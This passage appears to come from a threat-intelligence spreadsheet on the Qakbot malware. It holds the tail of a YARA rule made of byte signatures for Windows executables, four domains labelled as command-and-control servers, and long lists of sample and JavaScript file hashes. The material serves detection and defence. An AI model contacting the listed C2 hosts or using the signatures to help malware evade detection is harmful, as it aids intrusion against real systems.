        $5891110_63 = { 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? 4C ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 4C ?? ?? ?? 48 ?? ?? ?? 48 ?? ?? 0F 1F ?? ?? ?? 48 ?? ?? 0F 8E }_x005F_x000D_
        $7545077_63 = { 48 ?? ?? ?? ?? ?? ?? 0F 1F ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? 0F 84 }_x005F_x000D_
        $5903045_63 = { 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? 48 ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? 4C ?? ?? 0F 1F ?? ?? ?? 48 ?? ?? 73 }_x005F_x000D_
        $5127463_63 = { 48 ?? ?? ?? ?? 48 ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? 4C ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? 4C ?? ?? ?? ?? 4C ?? ?? 0F 9E ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 }_x005F_x000D_
        $6072198_63 = { 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 9? 48 ?? ?? 0F 84 }_x005F_x000D_
        $4935722_63 = { 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 ?? 0F 85 }_x005F_x000D_
        $4976425_63 = { 41 ?? ?? ?? ?? 0F 11 ?? ?? ?? ?? ?? ?? 4F ?? ?? ?? 4D ?? ?? ?? 41 ?? ?? ?? 0F 11 ?? ?? ?? ?? ?? ?? 4F ?? ?? ?? 4D ?? ?? ?? 41 ?? ?? ?? 0F 11 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? ?? 74 }_x005F_x000D_
        $4527589_63 = { 48 ?? ?? ?? ?? 48 ?? ?? 0F B7 ?? ?? ?? 0F B7 ?? ?? ?? 4C ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 4C ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 4C ?? ?? ?? ?? ?? ?? ?? 9? 48 ?? ?? 7D }_x005F_x000D_
        $4716056_63 = { 0F B6 ?? ?? ?? 0F B6 ?? 48 ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? 48 ?? ?? 48 ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? 48 ?? ?? ?? 66 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? C3 }_x005F_x000D_
        $5798030_63 = { 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 0F 1F ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 9? 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? 75 }_x005F_x000D_
        $6047533_63 = { 0F B6 ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 44 ?? ?? ?? ?? ?? 48 ?? ?? 48 }_x005F_x000D_
        $7558727_62 = { 31 ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 1F ?? 48 ?? ?? 0F 84 }_x005F_x000D_
        $4266979_62 = { 48 ?? ?? ?? 48 ?? ?? 8B ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? FF D? 48 ?? ?? ?? ?? 0F B6 ?? ?? 83 ?? ?? 88 ?? ?? 0F B6 ?? ?? BE ?? ?? ?? ?? 48 ?? ?? 48 ?? ?? ?? 48 ?? ?? 48 ?? ?? ?? ?? 66 ?? 74 }_x005F_x000D_
        $5892010_62 = { 4B ?? ?? ?? 49 ?? ?? ?? 49 ?? ?? ?? ?? 49 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? ?? 4C ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? 4C ?? ?? ?? ?? ?? ?? ?? 49 ?? ?? 0F 8F }_x005F_x000D_
        $5132165_62 = { 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? 9? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? 4C ?? ?? ?? ?? 4C ?? ?? 0F 9E ?? 48 ?? ?? ?? ?? 48 ?? ?? 48 ?? ?? ?? ?? EB }_x005F_x000D_
        $6850214_62 = { 44 ?? ?? ?? ?? ?? 8B ?? 89 ?? ?? ?? 8B ?? ?? 89 ?? ?? ?? 8B ?? ?? 89 ?? ?? ?? 8B ?? ?? 89 ?? ?? ?? 0F 10 ?? ?? ?? 0F 11 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? C3 }_x005F_x000D_
        $4976188_62 = { 41 ?? ?? ?? ?? 0F 11 ?? ?? ?? ?? ?? ?? 4B ?? ?? ?? 48 ?? ?? ?? 0F 10 ?? 0F 11 ?? ?? ?? ?? ?? ?? 4B ?? ?? ?? 48 ?? ?? ?? 0F 10 ?? 0F 11 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 }_x005F_x000D_
        $4610524_62 = { 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? 84 ?? 0F 85 }_x005F_x000D_
        $6072616_61 = { 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 1F ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? 0F 84 }_x005F_x000D_
        $4442442_61 = { 4C ?? ?? ?? ?? 4C ?? ?? ?? ?? ?? ?? 44 ?? ?? ?? ?? ?? ?? ?? 45 ?? ?? ?? 41 ?? ?? ?? 41 ?? ?? ?? 47 ?? ?? ?? 45 ?? ?? ?? 41 ?? ?? ?? 44 ?? ?? ?? ?? 4C ?? ?? ?? ?? ?? ?? 45 ?? ?? 0F 8E }_x005F_x000D_
        $4448822_61 = { 48 ?? ?? ?? ?? 0F 1F ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? 8B ?? 89 ?? C1 ?? ?? C1 ?? ?? 01 ?? C1 ?? ?? 41 ?? ?? C1 ?? ?? 29 ?? 85 ?? 0F 8C }_x005F_x000D_
        $4726213_61 = { 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 40 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? 4C ?? ?? 4C ?? ?? E8 ?? ?? ?? ?? 4C ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 0F B6 ?? ?? ?? 4C ?? ?? ?? ?? 48 }_x005F_x000D_
        $5127401_61 = { 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? 4C ?? ?? ?? ?? 4C ?? ?? 0F 9E ?? 48 ?? ?? ?? ?? 48 ?? ?? 48 ?? ?? ?? ?? EB }_x005F_x000D_
        $4357770_61 = { 48 ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? 0F 10 ?? ?? ?? ?? ?? 0F 11 ?? ?? ?? 0F 10 ?? ?? ?? ?? ?? 0F 11 ?? ?? ?? 31 ?? EB }_x005F_x000D_
        $5046026_60 = { 48 ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? FF D? 66 ?? 48 ?? ?? ?? 0F 85 }_x005F_x000D_
        $6918301_60 = { 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? 0F 10 ?? ?? ?? ?? ?? ?? 0F 11 ?? ?? 0F 10 ?? ?? ?? ?? ?? ?? 0F 11 ?? ?? 0F 10 ?? ?? ?? ?? ?? ?? 0F 11 ?? ?? 0F 10 ?? ?? ?? ?? ?? ?? 0F 11 ?? ?? EB }_x005F_x000D_
        $5651196_60 = { 0F 1F ?? ?? E8 ?? ?? ?? ?? 9? 66 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? ?? 31 ?? EB }_x005F_x000D_
        $5735857_60 = { E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 0F 1F ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? 75 }_x005F_x000D_
        $5058799_60 = { 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 0F BA ?? ?? 73 }_x005F_x000D_
        $4987306_60 = { 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? 81 E? ?? ?? ?? ?? 44 ?? ?? ?? ?? 41 ?? ?? ?? 4C ?? ?? 9? 0F B6 ?? 40 ?? ?? ?? 75 }_x005F_x000D_
        $4491881_60 = { 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? 48 ?? ?? ?? 48 ?? ?? ?? 48 ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? 0F 82 }_x005F_x000D_
        $5384124_60 = { 0F 1F ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? 75 }_x005F_x000D_
        $6212553_60 = { 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 9? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 0F 1F ?? ?? 48 ?? ?? 0F 84 }_x005F_x000D_
        $5991938_60 = { 4C ?? ?? 48 ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? 0F 94 ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 4C ?? ?? ?? ?? ?? ?? ?? 4C ?? ?? ?? ?? ?? ?? ?? 89 ?? 48 }_x005F_x000D_
        $4975050_60 = { 48 ?? ?? ?? ?? ?? ?? ?? 0F 10 ?? 0F 11 ?? ?? ?? ?? ?? ?? 0F 10 ?? ?? 0F 11 ?? ?? ?? ?? ?? ?? 0F 10 ?? ?? 0F 11 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 0F 1F ?? 48 ?? ?? ?? 0F 8F }_x005F_x000D_
        $7558357_59 = { 31 ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? 0F 84 }_x005F_x000D_
        $5152831_59 = { 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? 48 ?? ?? 0F 1F ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? 48 ?? ?? 48 }_x005F_x000D_
        $4347563_59 = { 48 ?? ?? ?? ?? 66 ?? ?? ?? 48 ?? ?? 48 ?? ?? 48 ?? ?? 9? 9? 48 ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? 48 ?? ?? 48 ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? 0F 83 }_x005F_x000D_
        $6022661_59 = { 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 0F 1F ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 89 ?? 48 }_x005F_x000D_
        $6139378_59 = { 88 ?? ?? ?? 44 ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? FF D? 48 ?? ?? ?? ?? 0F B6 ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? C3 }_x005F_x000D_
_x005F_x000D_
    condition:_x005F_x000D_
        uint16(0) == 0x5A4D and filesize &lt; 10MB and all of them_x005F_x000D_
}</t>
  </si>
  <si>
    <t>1680024238</t>
  </si>
  <si>
    <t>9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff</t>
  </si>
  <si>
    <t>2f3d90ac-7e8f-40cb-9450-54d724116405</t>
  </si>
  <si>
    <t>1680024239</t>
  </si>
  <si>
    <t>9880fae6551d1e9ee921f39751a6f3c0</t>
  </si>
  <si>
    <t>1556826468</t>
  </si>
  <si>
    <t>1556826489</t>
  </si>
  <si>
    <t>lg.prodigyprinting.com</t>
  </si>
  <si>
    <t>C2 domains</t>
  </si>
  <si>
    <t>Qakbot levels up with new obfuscation techniques</t>
  </si>
  <si>
    <t>hp.prodigyprinting.com</t>
  </si>
  <si>
    <t>layering.wyattspaintbody.net</t>
  </si>
  <si>
    <t>painting.duncan-plumbing.com</t>
  </si>
  <si>
    <t>00e4f65b721b334c3aa40e0c0fdc63107965874981fbfef1fc6a3ebb9d6c8d1c</t>
  </si>
  <si>
    <t>042b8c8ae4525b7fd067c6960def5bb01817bf884db9db0db42c2a3cb10ff327</t>
  </si>
  <si>
    <t>0633c16d45f6fdc9fd6ba13c86572bfb571e2307ea051e2c119b59458000b51d</t>
  </si>
  <si>
    <t>0dbf3f0a6a6b77eddd6e63849f2cea98edb855847a51ec313e7b764c5a5a3a59</t>
  </si>
  <si>
    <t>104d491cd7c6e3f7930edb780bed08fc88012a0f7f77f01ef987f270c9169b49</t>
  </si>
  <si>
    <t>1430582ad86023fe4b75f4721158ab72c28bef13592ad4462ac30f7b0784cc37</t>
  </si>
  <si>
    <t>20e53f19fb58b36c93fff100d0e003ff6e88017d6ee6ae8e56d72ba3e1827250</t>
  </si>
  <si>
    <t>21898a62a58602b67b39ea4c5ce971be4d73c861a1abff22337d2531f7b18d29</t>
  </si>
  <si>
    <t>2f5b2a72e40226c54871113b18d4e62c76d4cd05eb50a84c02774ed13daee411</t>
  </si>
  <si>
    <t>33e97cb8c1508b7795748e54634ebcd9b04259f14ef1f5dce32bad765885649a</t>
  </si>
  <si>
    <t>386796dcf6f731d43182b57dcaf1f7a9db346f84fdde59ea4c40e574983dd4e3</t>
  </si>
  <si>
    <t>3bd16f8213ff33b7e6ad5ba0974c2674e9a8f5a4b2a914006dbe060cec57d56e</t>
  </si>
  <si>
    <t>3c5fe3251afef44143b119f6ca45503dda70b51e006b882e9b0666a380c99774</t>
  </si>
  <si>
    <t>3f1eb5d603074d6d56d99cad4a31fad015e45855e9dbf0ea3ae1969077358a25</t>
  </si>
  <si>
    <t>42f6a0b64b8dda86c3905a12c3921ead06fa3f24b1231d1bcac7762fb54437d2</t>
  </si>
  <si>
    <t>45cbe796d27e48e8983eba169a72c5c3da03053ffd9ea519173482bed8af666e</t>
  </si>
  <si>
    <t>47df7cecfaf49a99c3ac8ebd5b47e4afe46658428dfc4818d7a968e0d84d6e19</t>
  </si>
  <si>
    <t>482f9255b94f1a7813e3cf631ac4bd14c559694b6162fadc6888a83d5c8f18dd</t>
  </si>
  <si>
    <t>485dda6eb0574979a04ba831df8ca0588cf034b3005d17153fb56088d31fd487</t>
  </si>
  <si>
    <t>4ca4665d30d38df77d13ed756d2310faaabc42e3eb3a1b18c26e1698f3e073bd</t>
  </si>
  <si>
    <t>4efdd3448fbaaa164c0735891512ece65f78d9160ffef0f1983e9539b1c502d7</t>
  </si>
  <si>
    <t>507d93bc04f4a52e451ec8e212f52397ff25b93e4ea3c9ab54fdd24c2c200171</t>
  </si>
  <si>
    <t>523789702a134745c78a1430ccc1704650181b2f4f773862d44d45ccf139b93f</t>
  </si>
  <si>
    <t>52b9d903cf6e578f781af3b1f38263fb2d81282a188e25cacf765d723d3de563</t>
  </si>
  <si>
    <t>5ac4fbe00b773cbeb52c58234a5d2676f1cf0961385eb6b73934fccdf82a6605</t>
  </si>
  <si>
    <t>630ba9a1630e90bdbe3d1f63161dc07714818f5b3010f6f9af6e624746529975</t>
  </si>
  <si>
    <t>6372b115bd5eb33d586519ce478ce161420c53e3d92103f2d8b2bb0e6efedfb8</t>
  </si>
  <si>
    <t>63cb6cf78b6263ccb6308de73f8084debacf62b88315809473f5b7ffbf9fcbf8</t>
  </si>
  <si>
    <t>668e1c7275dd3000fd0f24f2a5f9004fc5fd5293c646ad44882122889a99f353</t>
  </si>
  <si>
    <t>68b9de2981e3d74fbc83b3e26a45eda5611fd1791362d775e12b6db5f1f5f646</t>
  </si>
  <si>
    <t>6d0f5953b6a2234e00e720b297cdfa12a4d9074a92b85e9e5c508938b5907a0a</t>
  </si>
  <si>
    <t>6e840301949f41830b927ef569e581d349820387a3ff45a90ef4ec8e4f6f0e86</t>
  </si>
  <si>
    <t>1556826469</t>
  </si>
  <si>
    <t>6f840523ce151950e40e24bfedc27e6ba17a9f65b2a4c3105b543b44e153037d</t>
  </si>
  <si>
    <t>7086dd6a001e339ae9f789301de2fda398964799094587d55a8860199cdcbcba</t>
  </si>
  <si>
    <t>72a45d06936294c83c321d4fb312bdaa9b3afdc089975021f4b80d1046f62623</t>
  </si>
  <si>
    <t>75822e46bf9e827346da33141b8b69bb6210a29f2996d246d565e9567f95e9fe</t>
  </si>
  <si>
    <t>7758f78992fe71389e36b63d0b22f174d67b8139a80c96df5ebdcef7f1eaa954</t>
  </si>
  <si>
    <t>7772c892e7a846a7c7d852b73237f2d5e3aea485d423ddccfd7b66262b2a0a7a</t>
  </si>
  <si>
    <t>77833ef35c69cee4d6c43b13330ef71f08db13290d3d079040ab5d0298a57ccf</t>
  </si>
  <si>
    <t>78b83e6f1612dd86338faadbccd2b05ecdbcdf221ab694daa6fe1ce0928e2d68</t>
  </si>
  <si>
    <t>78e917a47f28905498694ec901ae7619c46c71d5f57879ad0a43a451d107b8a1</t>
  </si>
  <si>
    <t>7e9e493e41fab952e0a5681782a54954447abc3df6ef1d1860e59e586ea6c990</t>
  </si>
  <si>
    <t>81788d067834ea0298b88cc251ac4b56820bbb85c77345b35886c9af1b139e1c</t>
  </si>
  <si>
    <t>82bf2bf053fc21efd2b09403bb489d1f32e30ff4523a50963f05394524264ac6</t>
  </si>
  <si>
    <t>83a60ac3d70283ff82eeacdb500a204170c5ffcc6f59cbc30c0e7a5410ecb293</t>
  </si>
  <si>
    <t>83c4d91f93f56abf7504faa83a01a84210eb55de991131240a55dd22cb3cb55a</t>
  </si>
  <si>
    <t>87bf71ceaeacb6a70d86e6ff96ba4e1d2232c2b84242e8cef7ba30b5de47b4a4</t>
  </si>
  <si>
    <t>89b01325e7a7a8e41d598d07efec7ade3b5da72a97d0a02054c8be8edf41ceb7</t>
  </si>
  <si>
    <t>8a8e093089e7d144e5cbef20b5010a27da9c29ac0d64a924bb311a3a50ea5b05</t>
  </si>
  <si>
    <t>8b88a48e14aec83e1c87fe6ca7a66ad718a82276766756f5741fb446bfc0db8f</t>
  </si>
  <si>
    <t>8bbb44176e94f4e65cc6862e62f3b1544617edc889105e9af07886c0a62942ac</t>
  </si>
  <si>
    <t>8fa303e89e0f25b4929d3a175c948e3b5a1b257a50911f3eeaaab7f3218077e3</t>
  </si>
  <si>
    <t>9430fe8f223db4b551ed77e61ac6d38efee348940018ae9e1c15827f53cc618d</t>
  </si>
  <si>
    <t>9548afeb0037077a1e98feabe952472b6882eccd4c8ef6e1d3a93370198fa6a5</t>
  </si>
  <si>
    <t>99005c7ebde6c9d72e84fbf246c7b8aacc8e3c39132834b846a5ed4d49b1dcd5</t>
  </si>
  <si>
    <t>9926bc84e414ad65947461955bf043fe1dd11358f5d517785f6d0571b9acf548</t>
  </si>
  <si>
    <t>996ebea3b2e4b269cc10051f8a5d90cb0e68dee16a6000ff35bac85cb17024d4</t>
  </si>
  <si>
    <t>9f2bf3c3efdd1e388f87a64bac0bfc4b756cc923b428e85ef9e67a86f79c0bc7</t>
  </si>
  <si>
    <t>a0ea5b224ee2a85334cf434805edb9dd57b100975fd3c0a564b03d28a5203ee2</t>
  </si>
  <si>
    <t>a4416996ae9e25b496a343f5a94366ea33ac8797eccd289a83402978b03d371f</t>
  </si>
  <si>
    <t>aa11c00bc40f9bea2aff915d9cbf89e067aabdf764e52d664e7337545ffca04b</t>
  </si>
  <si>
    <t>abdcb3156ed4bcc5bce29f621ee8593fec625f74b3d1580cd1aa6e7557f822cf</t>
  </si>
  <si>
    <t>bd1190f7470b3219446024c9b85d1533d5ba56d24bcc618adfb05333c350ec8b</t>
  </si>
  <si>
    <t>bddac88644d3e23abba825283df777b76676b5348fd7225aa3dc3ead39ff7201</t>
  </si>
  <si>
    <t>bef299f5cff4b601adc6c8cde21d22465d19846f2f97d81fa8ea2439a4867864</t>
  </si>
  <si>
    <t>c075b937f4ad0b6077253ad1ebc8cf531c6f1ba167f90cd6ed77fc7a44684340</t>
  </si>
  <si>
    <t>c4f10d10da4598d970ada132f7a476f74902143567d45afd4858d4d9fa7210af</t>
  </si>
  <si>
    <t>c6edaa1e6125faddacb34f5f567cbb78abb1c138f970d914b95fdd4499052aa0</t>
  </si>
  <si>
    <t>c6ef40e940c92b8399792521eb677f5238e21ecf99834826990153efa41064ba</t>
  </si>
  <si>
    <t>c77ed215f5ca3eb4b5ab6926b32392c4d58bcaaa9ad1d585632372e7f059360f</t>
  </si>
  <si>
    <t>c97049d43b38577c01ef508c6ba5f6d15a3002728e5896b5d4982ee206a12a8b</t>
  </si>
  <si>
    <t>cd00617dd8eac1a70bff92d029861487197eb486deb0c4c66542af50309bc535</t>
  </si>
  <si>
    <t>cd9d8c6c3bc14559d5da15887c5c12be6ac6241b9c36d1fcc0063ad489d14bb5</t>
  </si>
  <si>
    <t>cdac2ca810ed43d4bd9bf7ade4b0a8dbc26fbeed3f11eee1aa5cb8334b6d6105</t>
  </si>
  <si>
    <t>d8b5067443c940864e972369e259a0826bb3774487c8605d6e5e870510d41504</t>
  </si>
  <si>
    <t>da823b80766ffc75ed32751ea6ded68e132976d28416fb78bddccd489372f069</t>
  </si>
  <si>
    <t>e30ddbd161e44cf7823b1850604d1cf87d4b9c9af8d0407bde05e7bb758a0559</t>
  </si>
  <si>
    <t>e3f9e76406739c68be2cd6a228131a63662e16fcf757c6251f5e4d0905ab3cd0</t>
  </si>
  <si>
    <t>e8f943454ab41dbd019434e0716d923fb87547cf73306b164ada93612d5f263f</t>
  </si>
  <si>
    <t>e8fff8ac794b44fade6bdf14f08104012bafff894e44003b84808a5bfd2cebbb</t>
  </si>
  <si>
    <t>e946b516013cb6cff31e21ee2ccabd1b8ce1e5ed5a4f9e36ffad07c4d880e417</t>
  </si>
  <si>
    <t>edf907d35b16877a6ff344bdb62852f0f1c418bc4f83072b518204e398e61365</t>
  </si>
  <si>
    <t>f9969aaab5276399d486a0619840e41e63340c1106f1e2652eb098052d8a2241</t>
  </si>
  <si>
    <t>fa3bc57c23c5f60050d5b6673681d8bc170d5c9417cfc4c231d3794800400315</t>
  </si>
  <si>
    <t>fe294978397abe1f23b88e47a94d516c977cd0c9cb368bcdc20f5f3899daf6bd</t>
  </si>
  <si>
    <t>dd8c25c7483acb627935b3ec6de505aa7fdf95ee4db8108b89d0deb57510217c</t>
  </si>
  <si>
    <t>Javascript hashes</t>
  </si>
  <si>
    <t>581fe44b3da62d2155452beeda2f20f63fa042271a97cd8e016b4f6f6f8b575f</t>
  </si>
  <si>
    <t>37f2b74550724859eb8b30fd60d8580c0e4eb6dc64d5d55e46774967fb0b9719</t>
  </si>
  <si>
    <t>9a849f42734c1bad3fa3c3b5cb5d8781c21e6241f8977636774384e6177756f2</t>
  </si>
  <si>
    <t>88b780e35400a63e5f2526e67287508865801f4c176b449c9bd9897a6f4d099e</t>
  </si>
  <si>
    <t>b853bf59cbfa95d5c76c76b5cf583d867929ffd164e248e33f55929ce0f65456</t>
  </si>
  <si>
    <t>84defbc371379f548cbfc7837128f33c35a2a95835d93e287c6c2f7f8428d910</t>
  </si>
  <si>
    <t>fa209beccf0fe4883b900462ecdf25f7a405adc962f393e116a556f4018773a3</t>
  </si>
  <si>
    <t>f7ea4652a096c007a233fb588d7a1b129a1b68829f78d58bb67b33c3582f032d</t>
  </si>
  <si>
    <t>16ea880880c3466e3ff95bc3df309242861b0d43600862b0e9f563bda90d00d3</t>
  </si>
  <si>
    <t>11447fbf6b64d137ab09ae7c861719169650a06ccc44abf0bcbbac8f5830343b</t>
  </si>
  <si>
    <t>e57062a03e0397ba7b5edba76b92f6e00e00a3f5f3126335a152803ba9dea5a9</t>
  </si>
  <si>
    <t>f3667a47b00bd70f06cefa19de31ccd818095638059f2fe237096741c6b47863</t>
  </si>
  <si>
    <t>86e07fcea780307b1ef2151b19a41170262947193b7b5b8998203ee0bb648c14</t>
  </si>
  <si>
    <t>d0fefd2af365336288bc8d7c9bb3d840e483cccf8c2afe493e3dc71e402a78c8</t>
  </si>
  <si>
    <t>3876816f0cc13e72c2ed64e857090c6a78106b9accc5f8d8fd90652a293890be</t>
  </si>
  <si>
    <t>170f58ca16e031ce31d117ba36a525189cfe4a08fece3fe1d65f18d293e2c7fe</t>
  </si>
  <si>
    <t>e64d432aac6c9209d84b9e9b9b77bae4148dba91f49e2871c6a14a2d0777e8e0</t>
  </si>
  <si>
    <t>8041bc11d40ef808f9a25a5b3d2104aa67e6ba5a696d1bd352ccdf8b3039df9b</t>
  </si>
  <si>
    <t>1333715b86d4009eb40b92675ed494dda786c275ccdcd59644ea3b0408df3d08</t>
  </si>
  <si>
